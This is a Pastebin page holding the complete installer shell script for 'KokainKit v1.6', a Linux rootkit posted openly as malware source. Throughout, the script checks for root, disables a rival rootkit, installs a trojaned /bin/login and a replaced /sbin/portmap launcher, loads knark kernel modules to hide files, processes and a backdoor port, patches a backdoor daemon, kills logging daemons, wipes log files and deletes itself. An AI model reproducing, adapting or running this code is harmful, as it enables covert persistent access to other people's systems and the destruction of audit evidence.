FlyFar

Backdoor.Linux.Kokain - Source Code

Jun 12th, 2023
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 4.38 KB | Cybersecurity | 0 0
  1. #!/bin/sh
  2.  
  3. # KokainKit v1.6 by deka
  4. # -
  5. # A rootkit based on knark and cobolt.
  6. # Do not Distribute!
  7. # -
  8.  
  9. TORNDIR=/usr/src/.puta
  10. THEPASS=$1
  11. DITTPORT=$2
  12. THEDIR=/usr/lib/$THEPASS
  13.  
  14. echo "---------------------------------------"
  15. echo "       KokainKit v1.6 by dekah&self"
  16. echo "---------------------------------------"
  17. echo ""
  18. echo "Using magic word $THEPASS and dittrichport $DITTPORT."
  19. echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
  20.  
  21. if ! test "$(whoami)" = "root"; then
  22.   echo "  - UID0 check failed"
  23.   echo ""
  24.   sleep 3
  25.   echo "FATAL: You're not root"
  26.   exit 1
  27. fi
  28.  
  29. if test -d "$TORNDIR"; then
  30.   echo "  - T0rnKit found. Screwing it up"
  31.   killall -9 in.inetd
  32.   killall -9 t0rntd
  33.   echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
  34.   echo "" > /usr/sbin/in.inetd
  35.   echo "ap" > $TORNDIR/.1file
  36.   echo "255.255" > $TORNDIR/.1addr
  37.   echo "255.255" > $TORNDIR/.1logz
  38.   echo "ap" > $TORNDIR/.1proc
  39. fi
  40.  
  41. if ! test -d "/usr/include"; then
  42.   echo "  - /usr/include does not exist, making it (ugly)..."
  43.   mkdir /usr/include
  44. fi
  45.  
  46. if ! test -d "/usr/include/pwdb"; then
  47.   echo "  - /usr/include/pwdb does not exist, making it (ugly)..."
  48.   mkdir /usr/include/pwdb
  49. fi
  50.  
  51. mkdir $THEDIR
  52. if test -d "$THEDIR"; then
  53.   echo "  - Secret dir created"
  54. else
  55.   echo "  - MkDir failed"
  56.   echo ""
  57.   echo "FATAL: Unable to create the secret directory"
  58.   exit 1
  59. fi
  60.  
  61. cd src
  62. echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
  63. echo "#define MAGIC_DIR  \"$THEDIR\"" >> kokain.h
  64.  
  65. gcc -O2 cobolt.c -o cobolt
  66. if test -r "./cobolt"; then
  67.   echo "  - Cobolt compiled"
  68. else
  69.   echo "  - gcc failed"
  70.   echo ""
  71.   cd ..
  72.   sleep 3
  73.   echo "FATAL: Unable to compile Cobolt"
  74.   exit 1
  75. fi
  76. touch -acmr /bin/login cobolt
  77. cp /bin/login $THEDIR/login1
  78. cp cobolt $THEDIR/login2
  79. echo "  - Cobolt installed"
  80.  
  81. gcc -O2 autoexec.c -o autoexec
  82. if test -r "./autoexec"; then
  83.   echo "  - AutoExec compiled"
  84. else
  85.   echo "  - gcc failed"
  86.   echo ""
  87.   cd ..
  88.   echo "FATAL: Unable to compile AutoExec"
  89.   exit 1
  90. fi
  91.  
  92. touch -acmr /sbin/portmap autoexec
  93. cp /sbin/portmap $THEDIR/portmap
  94. rm -f /sbin/portmap
  95. cp autoexec /sbin/portmap
  96. echo "#!/bin/sh" > $THEDIR/autoexec
  97. echo "  - AutoExec installed"
  98. cd ..
  99.  
  100. killall -9 syslogd klogd
  101. ./wipe u root >/dev/null 2>&1
  102. rm -f /var/log/messages /var/log/secure
  103. cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
  104. cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
  105. cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
  106. cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
  107. echo "  - Logs cleaned"
  108.  
  109. #echo "" > /etc/hosts.allow
  110. #echo "" > /etc/hosts.deny
  111. #echo "  - Hosts.deny/Hosts.allow cleaned"
  112. echo "  - Patching dittrich..."
  113. ./bpatch ./dittrich __PATCHPort__ $DITTPORT
  114.  
  115. cat <<E0F>> $THEDIR/.bashrc
  116. alias ls="ls --color -alF"
  117. alias dir="dir --color"
  118. export PS1="\u@\h:\w# "
  119. export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
  120. cd
  121. E0F
  122. echo "  - .bashrc created"
  123.  
  124. cp -R dittrich stuff $THEDIR
  125. echo "  - Stuff installed"
  126.  
  127. mkdir $THEDIR/knrk
  128. cd knark
  129. make >/dev/null 2>&1
  130. echo "  - Knark compiled"
  131. cd ..
  132. rm -rf knark/knrksrc knark/Makefile
  133. cp -R knark/* $THEDIR/knrk
  134. echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
  135. echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
  136. echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
  137. echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
  138. echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
  139. echo "$THEDIR/dittrich" >> $THEDIR/autoexec
  140. echo "killall -31 dittrich" >> $THEDIR/autoexec
  141.  
  142. /sbin/portmap >/dev/null 2>&1
  143. echo "  - Knark installed"
  144.  
  145. if test -d "/var/named/ADMROCKS"; then
  146.   rm -rf /var/named/ADMROCKS
  147.   echo "  - AdmRocks erased"
  148. fi
  149.  
  150. cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
  151. rm -f /etc/inetd.conf
  152. cp /tmp/blahah /etc/inetd.conf
  153. rm -f /tmp/blahah
  154. echo "  - Inetd.conf fixed"
  155.  
  156. PATH=/sbin:$PATH
  157. syslogd
  158. klogd
  159. echo "  - Syslogd/Klogd restarted"
  160. cd ..
  161. rm -rf *kokain*
  162. echo "  - KokainKit removed"
  163.  
  164. echo ""
  165. #echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--"
  166. if test -d "/proc/$THEPASS";
  167. then
  168.   echo "Knark installed successfully."
  169. else
  170.   echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
  171.   cp $THEDIR/login2 /bin/login
  172. fi
  173. echo "kitinst $THEPASS $DITTPORT"
  174. # - EoF - #
Add Comment
Please, Sign In to add comment